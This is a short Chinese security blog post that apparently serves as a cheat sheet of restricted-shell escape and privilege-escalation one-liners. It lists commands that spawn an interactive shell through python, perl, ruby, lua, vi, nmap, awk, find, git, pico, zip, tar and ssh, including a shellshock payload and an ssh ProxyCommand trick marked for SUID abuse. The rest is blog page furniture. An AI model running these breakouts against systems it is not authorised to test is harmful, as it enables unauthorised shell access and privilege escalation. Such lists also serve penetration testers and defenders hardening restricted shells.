Dragon
adminAdmin  2019-02-11 17:15 来源:lsh4ck's Blog 隐藏边栏 |   抢沙发  52 
文章评分 0 次,平均分 0.0

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB
exec "/bin/sh"
From within vi
:!bash
:set shell=/bin/bash:shell
From within nmap
!sh
From scp:
scp -S /path/yourscript x y:
AWK:
awk 'BEGIN {system("/bin/sh or /bin/bash")}'
find:
find / -name test -exec /bin/sh or /bin/bash \;
ssh username@IP – t "/bin/sh" or "/bin/bash"
ssh username@IP -t "bash –noprofile"
ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
git 帮助状态下通过!/bin/bash 进入交互式 shell
pico -s "/bin/bash"进入编辑器写入/bin/bash 然后按 ctrl + T 键
zip /tmp/test.zip /tmp/test -T –unzip-command="sh -c /bin/bash"
tar cf /dev/null testfile –checkpoint=1 –checkpointaction=exec=/bin/bash

本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:1 最后编辑于:2019-02-23
这个人很懒,什么都没写

发表评论

表情 贴图 链接 私密 格式 签到

切换注册

登录

忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享